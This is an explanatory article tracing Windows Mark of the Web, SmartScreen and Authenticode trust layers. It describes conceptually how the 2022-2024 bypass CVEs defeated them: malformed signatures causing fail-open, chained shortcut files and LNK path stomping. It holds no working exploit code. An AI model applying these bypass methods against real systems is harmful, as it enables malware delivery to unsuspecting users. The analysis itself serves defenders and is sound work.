A piece of metadata that records the origin of a file Windows did not produce itself. Originally a `` HTML comment recognised from Internet Explorer 4 (1997) and auto-written by Internet Explorer&apos;s Save As path from Internet Explorer 5 (1999), MOTW has lived since Windows XP SP2 as an NTFS alternate data stream named `Zone.Identifier` containing an INI-style `[ZoneTransfer]` block. Its only job is to let downstream consumers (SmartScreen, Office Protected View, the Attachment Manager) know that a file came from outside the local machine. It is a hint, not a cryptographic origin proof.
&lt;p&gt;Each of those three layers has a different failure mode. The 2022-2024 bypass arc weaponised one of those failure modes per year. CVE-2022-41091 was a &lt;em&gt;propagation&lt;/em&gt; failure in the origin layer. CVE-2022-44698 [@nvd-nist-gov-2022-44698] was a &lt;em&gt;parse&lt;/em&gt; failure in the reputation layer. CVE-2023-36025 was a &lt;em&gt;prompt-not-invoked&lt;/em&gt; failure in the shortcut-handling code that fronts the reputation layer. Each one tells you something about which layer was supposed to fire and didn&apos;t.&lt;/p&gt;
&lt;p&gt;Where this is headed: by the end of the article you should be able to draw the three layers from memory, name the propagator path that failed in each CVE, and predict where the next bypass will land. The structure is historical and then synthetic. We will trace MOTW from a 1997 HTML comment to the modern NTFS stream, follow SmartScreen from a 2006 phishing list to a kernel-adjacent execution gate, watch Authenticode catalogs go from a 2000 driver-signing convenience to the off-line trust root that survives SmartScreen outages, and then put the three back together inside Smart App Control on Windows 11. The 2022-2024 CVE arc is the thread that holds the narrative together because every advisory in it is a propagator break, and a propagator break is exactly what the three-layer architecture is designed not to tolerate.&lt;/p&gt;
&lt;h2&gt;2. &quot;Saved From URL&quot;: The Origin Tag Before It Was a Stream&lt;/h2&gt;
&lt;p&gt;Mark of the Web began life as a single HTML comment that Microsoft Learn&apos;s compatibility note [@learn-microsoft-com-compatibility-ms537628vvs85]) dates to &lt;em&gt;&quot;recognized starting with Microsoft Internet Explorer 4.0&quot;&lt;/em&gt; (September 1997). Internet Explorer 5 (March 1999) was the first IE release whose Save As path &lt;em&gt;auto-wrote&lt;/em&gt; the comment; IE4 was the first to &lt;em&gt;recognise&lt;/em&gt; it. The comment looked like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!-- saved from url=(NNNN)... --&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The number in parentheses is the length of the URL, in characters. The whole comment had to appear in the first 2,048 bytes of a locally saved HTML file. The token &lt;code&gt;about:internet&lt;/code&gt; is the documented placeholder for the generic Internet zone, used when the original URL is not available. If Internet Explorer found such a comment there on open, IE pretended the file had come from that URL rather than from the local file system. The full Microsoft Learn lineage continues: &lt;em&gt;&quot;Beginning with Microsoft Internet Explorer 6 for Windows XP Service Pack 2 (SP2), you can also add the comment to multipart HTML (MHT) files and to XML files.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;That sounds like a small detail. It was a defensive patch on a much bigger architectural decision. Alongside it, with Internet Explorer 4.0 in 1997, Microsoft had introduced the URLZONE enumeration [@learn-microsoft-com-apis-ms537175vvs85]) -- a small integer table whose five named defaults put every URL into one of five buckets. The buckets are still in &lt;code&gt;urlmon.h&lt;/code&gt; today:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th align=&quot;right&quot;&gt;Value&lt;/th&gt;
&lt;th&gt;Constant&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;0&lt;/td&gt;
&lt;td&gt;&lt;code&gt;URLZONE_LOCAL_MACHINE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The local machine itself (&lt;code&gt;file://&lt;/code&gt;, in-process resources)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;URLZONE_INTRANET&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The corporate intranet&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;URLZONE_TRUSTED&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The user-configured Trusted Sites list&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;3&lt;/td&gt;
&lt;td&gt;&lt;code&gt;URLZONE_INTERNET&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The public Internet&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;4&lt;/td&gt;
&lt;td&gt;&lt;code&gt;URLZONE_UNTRUSTED&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The user-configured Restricted Sites list&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

A five-value default enumeration introduced in Internet Explorer 4.0 (1997) that assigns a single integer to every fully qualified URL. The five named constants (`URLZONE_LOCAL_MACHINE`=0 through `URLZONE_UNTRUSTED`=4) occupy the predefined range `URLZONE_PREDEFINED_MIN`=0 to `URLZONE_PREDEFINED_MAX`=999; administrator- or IE-configured custom zones can occupy the reserved `URLZONE_USER_MIN`=1000 to `URLZONE_USER_MAX`=10000 range. In practice all observed downstream consumers key on the five defaults. Every later Windows trust signal -- MOTW, SmartScreen, Smart App Control -- ultimately resolves a file to one of these integers via the IInternetSecurityManager::MapUrlToZone API [@learn-microsoft-com-apis-ms537133vvs85]). &quot;Zone 3&quot; and &quot;Internet Zone&quot; are the vocabulary every later layer inherits.
&lt;p&gt;The asymmetry that mattered was zone 0. Content loaded from the Local Machine Zone got the most-privileged ActiveX, scripting, and cross-frame policy Microsoft documented [@learn-microsoft-com-apis-ms537183vvs85]) for any of the five zones. So if an attacker could get an HTML page onto your disk and trick you into opening it locally, that page ran with strictly more authority than the same page would have had if served from &lt;code&gt;attacker.example&lt;/code&gt;. The whole MOTW HTML comment exists to undo that gift: it told IE &lt;em&gt;&quot;treat this saved page as if it came from the originating Internet URL, not from &lt;code&gt;file://&lt;/code&gt;.&quot;&lt;/em&gt;The Internet Zone (&lt;code&gt;ZoneId=3&lt;/code&gt;) is the only &lt;code&gt;URLZONE&lt;/code&gt; value that uniformly triggers downstream consumers like SmartScreen, Office Protected View, and the Attachment Manager. Files marked &lt;code&gt;ZoneId=2&lt;/code&gt; (Trusted) bypass the prompt, an asymmetry that has its own history of social-engineering misuse over the years.&lt;/p&gt;
&lt;h3&gt;From HTML comment to NTFS stream&lt;/h3&gt;
&lt;p&gt;The HTML-comment form had one structural problem: it only worked for HTML. By 2003, the dominant delivery formats were &lt;code&gt;.exe&lt;/code&gt;, &lt;code&gt;.zip&lt;/code&gt;, &lt;code&gt;.doc&lt;/code&gt;, and &lt;code&gt;.scr&lt;/code&gt; -- formats with no obvious place to carry a comment that survived round-trips through editors and archivers. The 2004 Attachment Manager documentation [@support-microsoft-com-ee9b-cd795ae42738] records the Windows XP SP2 response: move the origin tag out-of-band, into an NTFS alternate data stream that any process could read by appending &lt;code&gt;:Zone.Identifier:$DATA&lt;/code&gt; to the file path.&lt;/p&gt;

An NTFS feature that lets a file carry multiple named secondary data streams in addition to its primary content. Streams are addressed with the syntax `filename:streamname:type`. A file `payload.exe` can have a sidecar stream `payload.exe:Zone.Identifier:$DATA` that any process with read access to the file can open. Streams are invisible to most ordinary tools (`dir`, copy-paste through Windows Explorer between NTFS volumes preserves them; copies onto FAT/exFAT lose them silently).
&lt;p&gt;The MS-FSCC Zone.Identifier reference [@learn-microsoft-com-8c39-2516a9df36e8] is the normative description: &lt;em&gt;&quot;Windows Internet Explorer uses the stream name Zone.Identifier for storage of URL security zones. The fully qualified form is sample.txt:Zone.Identifier:$DATA. The stream is a simple text stream of the form: [ZoneTransfer] ZoneId=3.&quot;&lt;/em&gt; The whole protocol is one INI block in UTF-16 LE. Read the stream, parse the integer, you have the zone.&lt;/p&gt;
&lt;p&gt;Three things shipped together in XP SP2 in August 2004 and are still the load-bearing primitives in Windows 11 today. They are worth listing as a set because every later trust mechanism consumes them:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The Attachment Execution Service.&lt;/strong&gt; An OS service that intercepts file launches initiated by browsers, mail clients, and IM apps. It looks up the file&apos;s &lt;code&gt;Zone.Identifier&lt;/code&gt;, decides which per-zone policy applies, and either runs the file silently, prompts the user, or refuses.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The &lt;code&gt;Zone.Identifier&lt;/code&gt; stream itself.&lt;/strong&gt; The INI block above, written by any &quot;quarantine-aware&quot; downloader (IE6, then Edge, Outlook, OneDrive, Teams; later 7-Zip, WinRAR, and most major third-party tools).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The &lt;code&gt;IZoneIdentifier&lt;/code&gt; [@learn-microsoft-com-apis-ms537032vvs85]) COM interface.&lt;/strong&gt; The supported programmatic read/write surface for the stream, in &lt;code&gt;urlmon.h&lt;/code&gt; / &lt;code&gt;urlmon.dll&lt;/code&gt;. Microsoft Learn dates it: &lt;em&gt;&quot;The IZoneIdentifier interface was introduced in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 (SP2).&quot;&lt;/em&gt;&lt;/li&gt;
&lt;/ol&gt;

The Windows OS service introduced in XP SP2 (2004) that intercepts file launches initiated by browsers, mail clients, and other registered &quot;trust-aware&quot; callers. It reads the file&apos;s `Zone.Identifier` ADS via the Shell COM surface and applies per-zone policy: launch silently, prompt the user with the Attachment Manager dialog, or refuse. SmartScreen integrates as a consumer of the Attachment Execution Service on Windows 8 and later.
&lt;p&gt;The Internet Explorer 6 update of 2004 was the first to write the ADS on download. Later releases of IE (7, 8, 9, 10) added the &lt;code&gt;IZoneIdentifier2&lt;/code&gt; interface with new keys -- &lt;code&gt;AppDefinedZoneId&lt;/code&gt; and &lt;code&gt;LastWriterPackageFamilyName&lt;/code&gt; [@learn-microsoft-com-apis-mt243886vvs85]) -- and a fully populated stream from a 2025-era Edge download looks like this:The &lt;code&gt;LastWriterPackageFamilyName&lt;/code&gt; field is how downstream consumers know which AppContainer wrote the ADS, which the Office macro-blocking logic uses to differentiate, for example, &quot;this file was downloaded by Edge&quot; from &quot;this file was extracted by an unspecified archiver.&quot;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ZoneTransfer]
ZoneId=3
ReferrerUrl=&amp;lt;origin page URL&amp;gt;
HostUrl=&amp;lt;payload URL&amp;gt;
LastWriterPackageFamilyName=Microsoft.MicrosoftEdge_8wekyb3d8bbwe
AppZoneId=3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That seemingly minor &lt;code&gt;[ZoneTransfer] ZoneId=3&lt;/code&gt; integer is the input to every higher-level trust decision Windows makes about a downloaded file for the next two decades. Office&apos;s default blocking of macros from internet-zone files [@learn-microsoft-com-macros-blocked] operationally consumes this same &lt;code&gt;ZoneId=3&lt;/code&gt;. SmartScreen consumes it. WDAC + ISG consumes it. Smart App Control consumes it. Five integers and a sidecar stream, and Windows has a story for &quot;where did this come from?&quot;&lt;/p&gt;
&lt;p&gt;What it does not have yet, in 2004, is a story for &quot;what does the world think of this file?&quot; The next several years are the history of that second question.&lt;/p&gt;
&lt;h2&gt;3. What Failed Before: HTML Comments, Block Lists, and the Limits of Static Knowledge&lt;/h2&gt;
&lt;p&gt;Two early attempts at &quot;is this file safe?&quot; failed in instructive ways. Both put the answer either &lt;em&gt;inside&lt;/em&gt; the file or &lt;em&gt;inside&lt;/em&gt; a static list, and attackers moved faster than either could update.&lt;/p&gt;
&lt;h3&gt;The in-band tag&lt;/h3&gt;
&lt;p&gt;The HTML-comment MOTW of 1999-2003 was the first attempt. It worked, narrowly, for the one attack it was built to stop: a saved HTML page that ran with Local-Machine-Zone trust. But it had three structural failings the moment you stepped outside HTML.&lt;/p&gt;
&lt;p&gt;First, it was &lt;em&gt;in-band&lt;/em&gt;. Any text editor or third-party HTML processor that did not understand the comment convention would happily strip it as whitespace. A &lt;code&gt;.zip&lt;/code&gt; extraction tool that round-tripped through a temp file lost it. So did a &quot;Save As&quot; path through a non-IE browser. The whole protocol depended on every reader of HTML preserving a comment that looked, to anyone unfamiliar, like noise.&lt;/p&gt;
&lt;p&gt;Second, it was &lt;em&gt;format-specific&lt;/em&gt;. The attack vector by 2002 had moved to &lt;code&gt;.exe&lt;/code&gt;, &lt;code&gt;.scr&lt;/code&gt;, &lt;code&gt;.com&lt;/code&gt;, and the Office macro formats. None of these had a sanctioned place to carry an origin annotation. You could embed something in a custom resource section, but readers and writers of the file format would not preserve it.&lt;/p&gt;
&lt;p&gt;Third, it was &lt;em&gt;consumer-specific&lt;/em&gt;. Only Internet Explorer (and, briefly, Outlook through its HTML rendering) knew to look for the comment. A user who opened the file in Word, Excel, a third-party HTML editor, or a &lt;code&gt;.htm&lt;/code&gt;-handling email client got no benefit. The XP SP2 NTFS-ADS move solved all three problems at once: out-of-band (no in-band parser conflicts), format-agnostic (every file type can carry an ADS), and consumer-agnostic (any code path that knows to ask can read the stream).&lt;/p&gt;
&lt;h3&gt;The static block list&lt;/h3&gt;
&lt;p&gt;The other pre-modern attempt was the IE7 Phishing Filter [@learn-microsoft-com-defender-smartscreen], which shipped with Internet Explorer 7 on October 18, 2006 [@en-wikipedia-org-wiki-internetexplorer7]. The Microsoft Defender SmartScreen overview page on Microsoft Learn dates the SmartScreen lineage back to that period (the original blog posts are no longer at stable URLs, but the lineage statement on the live overview page is the canonical reference). The IE7 design was a daily-refreshed list of known-bad URLs plus a small set of heuristics on URL structure that would catch obvious phishing patterns inline.&lt;/p&gt;
&lt;p&gt;It was the right instinct and the wrong primitive. &lt;em&gt;Daily-refreshed&lt;/em&gt; fell catastrophically against fast-flux DNS, which rotated phishing domains every few minutes. &lt;em&gt;URL-only&lt;/em&gt; meant the filter had no opinion about a file you had already downloaded, since downloads were addressed by URL only until the file arrived on disk. By 2008 attackers had taught the system that the URL was not the right key. The right key was the &lt;em&gt;file&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;That insight, attributed contemporaneously to the IE8 and IE9 program-management teams (Eric Lawrence&apos;s IEInternals-era writing is the most-cited surviving record), became the IE8 SmartScreen Filter [@learn-microsoft-com-defender-smartscreen] when Internet Explorer 8 shipped on March 19, 2009 [@en-wikipedia-org-wiki-internetexplorer8] and then SmartScreen Application Reputation [@elastic-co-app-control] in Internet Explorer 9 (announced 2010, shipped March 14, 2011) [@en-wikipedia-org-wiki-internetexplorer9]. The Elastic Security Labs writeup &lt;em&gt;Dismantling Smart App Control&lt;/em&gt; [@elastic-co-app-control] puts the historical pivot in one sentence: &lt;em&gt;&quot;Microsoft SmartScreen has been a built-in OS feature since Windows 8.&quot;&lt;/em&gt; What Windows 8 did in October 2012 was move the SmartScreen check out of Internet Explorer entirely and into the Shell&apos;s &lt;code&gt;IAttachmentExecute&lt;/code&gt; execute path, so any file with &lt;code&gt;Zone.Identifier:ZoneId=3&lt;/code&gt; got a reputation check at launch time, regardless of which browser had downloaded it.&lt;/p&gt;
&lt;p&gt;The generational shift that matters is not the move into the Shell, though. It is the move from &quot;is this &lt;em&gt;URL&lt;/em&gt; on a list?&quot; to &quot;what is this &lt;em&gt;file&lt;/em&gt;&apos;s prevalence and publisher reputation across our global telemetry?&quot; That is a different question with a different answer, and it required a different machine.&lt;/p&gt;

A pure file-hash reputation system has an obvious cold-start problem. Every brand-new build of legitimate software has a brand-new hash. If the only knob is &quot;have we seen this hash before?&quot;, every legitimate first-day install triggers a warning, and over time users learn to click through warnings reflexively. Add a *publisher* signal -- the Authenticode certificate the file is signed with -- and the reputation system can carry confidence forward across builds: a publisher who has signed thousands of well-reputed binaries gets the benefit of the doubt on the next build, before any individual hash has accumulated telemetry. The publisher signal does for files what TLS server certificates do for URLs: it lets the system attribute behaviour to a long-lived identity rather than to ephemeral content.
&lt;p&gt;Microsoft already had a publisher signal in 1996 -- Authenticode [@en-wikipedia-org-wiki-codesigning], the PE-embedded code-signing scheme that shipped with Internet Explorer 3 in August 1996 [@en-wikipedia-org-wiki-internetexplorer3] and is formally specified by the 2008 &lt;em&gt;Windows Authenticode Portable Executable Signature Format&lt;/em&gt; [@download-microsoft-com-d599bac8184a-authenticodepedocx]. And it already had a way to vouch for many files at once -- catalog files, the &lt;code&gt;.cat&lt;/code&gt; format that had shipped with Windows 2000 for driver-package signing. The next generation of file trust would weave all three signals together. Origin from MOTW. Reputation from SmartScreen. Publisher attestation from Authenticode and catalogs. That weave is the subject of the next section, and it is, finally, where the 2022-2024 CVEs land.&lt;/p&gt;
&lt;h2&gt;4. The Evolution, Generation by Generation&lt;/h2&gt;
&lt;p&gt;Each generation of Windows file trust was forced into existence by a specific failure of the previous one. The evolution was not planned. It was driven by attackers.&lt;/p&gt;

flowchart LR
    G0[&quot;Gen 0 (1999-2003) -- HTML-comment MOTW -- + Local Machine Zone&quot;]
    G1[&quot;Gen 1 (2004-2009) -- NTFS Zone.Identifier ADS -- + Attachment Execution Service&quot;]
    G2[&quot;Gen 2 (2009-2018) -- SmartScreen App Reputation -- cloud lookup + 2-stage UX&quot;]
    G3[&quot;Gen 3 (2018-2024+) -- MOTW propagation hardening -- + catalogs + Smart App Control&quot;]
    G0 --&amp;gt;|&quot;format-specific, -- trivially stripped&quot;| G1
    G1 --&amp;gt;|&quot;binary tag, -- no graduated score&quot;| G2
    G2 --&amp;gt;|&quot;fail-open on -- parse error&quot;| G3
    G3 --&amp;gt;|&quot;propagator gaps -- still active&quot;| G3
&lt;h3&gt;Generation 1 (2004-2009): the NTFS Zone.Identifier ADS&lt;/h3&gt;
&lt;p&gt;The insight was that the origin tag should be out-of-band. The mechanism was three primitives shipped together in XP SP2: the &lt;code&gt;[ZoneTransfer]&lt;/code&gt; INI block in the &lt;code&gt;Zone.Identifier&lt;/code&gt; stream, the &lt;code&gt;IZoneIdentifier&lt;/code&gt; / &lt;code&gt;IAttachmentExecute&lt;/code&gt; COM surface, and the Attachment Execution Service. The Outflank red-team writeup &lt;em&gt;Mark-of-the-Web from a Red Team Perspective&lt;/em&gt; [@outflank-nl-teams-perspective] -- published in March 2020 and widely treated as the canonical pre-CVE documentary record of Generation 1&apos;s failure modes -- enumerates what Generation 1 could and could not do.&lt;/p&gt;
&lt;p&gt;What it could do: survive copies through Windows Explorer between NTFS volumes, identify the originating zone integer, and trigger the Attachment Manager prompt for executable launches.&lt;/p&gt;
&lt;p&gt;What it could not do: distinguish the 40-millionth download of Adobe Reader from the first-ever download of &lt;code&gt;flash-update.exe&lt;/code&gt;. A binary &quot;Internet zone, yes or no&quot; tag has no opinion about the file&apos;s reputation. It also could not survive copies onto FAT or exFAT, did not survive most archiver extractions in the 2010s, and was trivially stripped by any user-mode process via &lt;code&gt;DeleteFile&lt;/code&gt; [@learn-microsoft-com-fileapi-deletefilew] on the ADS name. The Outflank post enumerated the operational gaps and the SANS Internet Storm Center diary by Didier Stevens [@isc-sans-edu-diary-28810] operationalised the test case for 7-Zip specifically.&lt;/p&gt;
&lt;p&gt;The failure that pushed the system to Generation 2 was simple. A binary tag cannot rank-order ten million Internet-zone downloads. The 2008-2010 attacker pattern was high-volume file rotation: deliver the same payload under thousands of fresh URLs and filenames, defeat any URL-based block list, and let the file&apos;s &quot;Internet-zone yes/no&quot; tag carry zero information about whether the specific bytes on disk were known-bad, known-good, or simply unknown. The reputation oracle was the answer.&lt;/p&gt;
&lt;h3&gt;Generation 2 (2009-2018): SmartScreen Application Reputation&lt;/h3&gt;
&lt;p&gt;The insight was that &quot;is this file safe?&quot; needs a &lt;em&gt;graduated score&lt;/em&gt;, not a binary tag, computed against global telemetry. The mechanism is what Microsoft Learn calls Microsoft Defender SmartScreen [@learn-microsoft-com-defender-smartscreen], and the reputation-for-developers page [@learn-microsoft-com-smartscreen-reputation] documents the two-signal model in present-day terms. The cloud lookup is keyed on three things at once: the SHA-256 of the file content, the Authenticode publisher certificate&apos;s identity (when there is one), and the URL the file came from (the &lt;code&gt;HostUrl&lt;/code&gt; and &lt;code&gt;ReferrerUrl&lt;/code&gt; from the MOTW ADS, plus the in-browser navigation URL where applicable).&lt;/p&gt;
&lt;p&gt;The backend returns one of three verdicts: known-good, known-bad, or unknown. The user-visible artefact is the two-stage &quot;Windows protected your PC&quot; prompt -- described in detail in §6.2 -- designed to ensure a single oblivious click cannot launch an unreputed binary.&lt;/p&gt;
&lt;p&gt;Generation 2 worked well enough for several years. The failure that pushed it to Generation 3 was structural and load-bearing for the rest of this article. It was: &lt;strong&gt;the SmartScreen lookup gates the warning, so any way to make the lookup error out gates the warning off.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In October 2022, Magniber ransomware actors started signing JS payloads with deliberately malformed Authenticode signatures. The malformed signature was not an attempt to forge anything; it was an attempt to &lt;em&gt;crash the parser&lt;/em&gt;. HP Wolf Security&apos;s campaign analysis [@threatresearch-ext-hp-com-software-updates] by Patrick Schläpfer documented the September-2022 pivot from MSI/EXE to JS delivery; Will Dormann linked the campaign to a SmartScreen bug on social media in mid-October; and Mitja Kolsek&apos;s October 2022 0patch blog post [@blog-0patch-com-bypassing-motwhtml] reverse-engineered the root cause and shipped a micropatch &lt;em&gt;46 days before&lt;/em&gt; Microsoft&apos;s December 2022 fix, which was eventually catalogued as CVE-2022-44698 [@nvd-nist-gov-2022-44698].&lt;/p&gt;

Mitja Kolsek and the ACROS Security team behind 0patch have repeatedly shipped third-party micropatches for SmartScreen-class bypasses ahead of Microsoft, and the October 2022 CVE-2022-44698 patch is the cleanest case to study. The methodological lesson is that a bug fully reproducible in user mode, with a localised binary patch, can be fixed by a small independent team faster than a Patch Tuesday cycle. The same pattern would later apply to the 2024 LNK-stomping family. The cost of the approach is fragility: 0patch&apos;s binary patches target specific OS build numbers and must be re-issued for each Windows servicing update.
&lt;p&gt;Google Threat Analysis Group&apos;s Benoit Sevens published the canonical pseudocode reconstruction [@blog-google-smartscreen-bypass] of the bug in March 2023 -- which both reused 0patch&apos;s earlier flow diagram and added the function-level walk-through -- alongside the CVE-2023-24880 [@nvd-nist-gov-2023-24880] disclosure that documented Microsoft&apos;s incomplete patch:&lt;/p&gt;

By default, shdocvw.dll&apos;s `DoSafeOpenPromptForShellExec` will not display a security warning, and if the `smartscreen.exe` request returns an error for whatever reason, `DoSafeOpenPromptForShellExec` proceeds with using the default option and runs the file without displaying any security warnings to the user. -- Benoit Sevens, Google TAG, March 2023
&lt;p&gt;That is the architectural confession. The function that fronts the SmartScreen lookup is named &lt;code&gt;DoSafeOpenPromptForShellExec&lt;/code&gt;. It interprets a parser error from &lt;code&gt;smartscreen.exe&lt;/code&gt; as &quot;no warning needed&quot; rather than as &quot;the lookup failed, default to fail-closed.&quot; A malformed Authenticode signature -- a payload-controlled input -- crashes the parser. The function does what it was written to do.The CVE-2023-24880 sequel is illustrative. Microsoft&apos;s December 2022 patch narrowed the parser&apos;s error handling for one specific malformed-signature shape. Within three months, Magniber actors had pivoted from JS files to MSI files using a &lt;em&gt;different&lt;/em&gt; malformed-signature shape that hit the same fail-open code path in a still-unpatched branch. Google TAG observed &lt;em&gt;&quot;over 100,000 downloads of the malicious MSI files since January 2023, with over 80% to users in Europe.&quot;&lt;/em&gt; The patch fixed the symptom, not the root cause.&lt;/p&gt;

sequenceDiagram
    participant Shell as Explorer/Shell
    participant DSOP as shdocvw.dll -- DoSafeOpenPromptForShellExec
    participant SS as smartscreen.exe
    participant SR as signature_info::retrieve
    participant Cloud as App Reputation Service
    Shell-&amp;gt;&amp;gt;DSOP: ShellExecute on MOTW-tagged file
    DSOP-&amp;gt;&amp;gt;SS: Reputation request -- (hash + cert + URL)
    SS-&amp;gt;&amp;gt;SR: Parse Authenticode signature
    Note over SR: Malformed signature -- parser returns error
    SR--&amp;gt;&amp;gt;SS: ERROR
    SS--&amp;gt;&amp;gt;DSOP: ERROR (not &quot;fail-closed&quot;)
    Note over DSOP: CVE-2022-44698: -- treats ERROR as &quot;no warning needed&quot;
    DSOP-&amp;gt;&amp;gt;Shell: Run file (no prompt)
    Note right of Cloud: Cloud never queried
&lt;h3&gt;Generation 3 (2018-2024+): propagation hardening, catalogs revived, Smart App Control&lt;/h3&gt;
&lt;p&gt;If Generation 2&apos;s defining failure is the &lt;em&gt;parse&lt;/em&gt; class, Generation 3&apos;s defining failure is the &lt;em&gt;propagation&lt;/em&gt; class. The insight is that the chain is only as strong as its weakest propagator: every code path that copies, extracts, mounts, or saves a marked file must propagate the origin tag, or the entire downstream stack is silently disabled for the descendants of that path.&lt;/p&gt;
&lt;p&gt;A multi-year hardening campaign followed. The names below are the propagator paths Microsoft (and the wider vendor community) had to teach to honour the MOTW contract:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;7-Zip 22.00 (June 2022).&lt;/strong&gt; Igor Pavlov added the &lt;code&gt;-snz&lt;/code&gt; command-line switch and the &lt;code&gt;WriteZoneIdExtract&lt;/code&gt; registry value. With the option enabled, 7-Zip propagates the parent archive&apos;s &lt;code&gt;Zone.Identifier&lt;/code&gt; to each extracted member. Didier Stevens documented the new flag in a SANS Internet Storm Center diary [@isc-sans-edu-diary-28810]; the community-maintained archiver-MOTW-support-comparison matrix on GitHub [@github-com-support-comparison] records which archivers propagate, which do so only for specific file extensions, and which still do not.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Outlook attachment-save (2022).&lt;/strong&gt; Outlook&apos;s save-attachment path was taught to write &lt;code&gt;Zone.Identifier:ZoneId=3&lt;/code&gt; on the saved file. Office Insider builds carried this in early 2022 and general availability followed later that year.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Explorer ISO/IMG/VHD/VHDX mount (November 2022).&lt;/strong&gt; CVE-2022-41091 [@nvd-nist-gov-2022-41091] -- the bug that opens this article. Will Dormann&apos;s disclosure resulted in the November 2022 patch that taught Explorer&apos;s container-file mount path to copy the parent file&apos;s &lt;code&gt;Zone.Identifier&lt;/code&gt; onto every file visible through the mount. BleepingComputer&apos;s coverage [@bleepingcomputer-com-push-malware] quoted Microsoft&apos;s Bill Demirkapi confirming the propagation root cause.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Internet Shortcut &lt;code&gt;.url&lt;/code&gt; handling (November 2023).&lt;/strong&gt; CVE-2023-36025 [@nvd-nist-gov-2023-36025], exploited in the Phemedrone Stealer campaign that Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun documented in a Trend Micro Research writeup [@trendmicro-com-phemedrone-stealhtml]. A crafted &lt;code&gt;.url&lt;/code&gt; file with a &lt;code&gt;URL=&lt;/code&gt; field pointing at a remote &lt;code&gt;.cpl&lt;/code&gt; payload bypassed the SmartScreen prompt entirely, even though the &lt;code&gt;.url&lt;/code&gt; itself carried MOTW. The failure was that the &lt;code&gt;.url&lt;/code&gt; handler chose not to invoke SmartScreen for certain target types. BleepingComputer&apos;s reporting [@bleepingcomputer-com-phemedrone-malware] on the in-the-wild exploitation gives the practitioner context.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shortcut chains (February 2024).&lt;/strong&gt; CVE-2024-21412 [@nvd-nist-gov-2024-21412] -- a &lt;code&gt;.url&lt;/code&gt; pointing at another &lt;code&gt;.url&lt;/code&gt; (typically on an attacker-controlled WebDAV share). Trend Micro&apos;s Water Hydra writeup [@trendmicro-com-defender-shtml] by Peter Girnus documented the use of this chain to deliver the DarkMe RAT to financial-market traders, with the DarkGate companion writeup [@trendmicro-com-windows-smahtml] covering a parallel campaign. BleepingComputer&apos;s coverage [@bleepingcomputer-com-darkme-malware] records the February 13 patch date.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shortcut chains, again (April 2024).&lt;/strong&gt; CVE-2024-29988 [@nvd-nist-gov-2024-29988] and ZDI-24-361 [@zerodayinitiative-com-24-361] -- the bypass of the bypass, jointly credited to Peter Girnus (Trend Micro ZDI) and Dmitrij Lenz and Vlad Stolyarov of Google TAG. Microsoft&apos;s February 2024 patch had closed one chained-shortcut path but left a sibling path open. The classification migrated from &quot;Internet Shortcut Files SFB&quot; to &quot;SmartScreen Prompt SFB,&quot; reflecting that the failure had moved up the call chain into the prompt-display code itself. BleepingComputer [@bleepingcomputer-com-malware-attacks] and Help Net Security [@helpnetsecurity-com-2024-29988] covered the joint April-2024 disclosure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;LNK extended-path stomping (September 2024).&lt;/strong&gt; CVE-2024-38217 [@nvd-nist-gov-2024-38217], disclosed by Joe Desimone of Elastic Security Labs as part of the &lt;em&gt;Dismantling Smart App Control&lt;/em&gt; [@elastic-co-app-control] writeup. A &lt;code&gt;.lnk&lt;/code&gt; with a non-canonical &lt;code&gt;LinkTarget IDList&lt;/code&gt; -- a path with a trailing dot or space, or an unusual extended-path encoding -- triggers Explorer&apos;s canonicalisation pass to rewrite the file in place, &lt;em&gt;and the rewrite happens before &lt;code&gt;CheckSmartScreen&lt;/code&gt; is called&lt;/em&gt;. The act of rewriting strips the &lt;code&gt;Zone.Identifier&lt;/code&gt; stream. The trust signal is erased between the moment the file is opened and the moment SmartScreen would have inspected it. AhnLab&apos;s independent writeup [@asec-ahnlab-com-en-90299] confirms the September 10, 2024 patch date and the LNK-stomping classification. Elastic reported VirusTotal evidence of in-the-wild samples dating back six years.&lt;/li&gt;
&lt;/ul&gt;
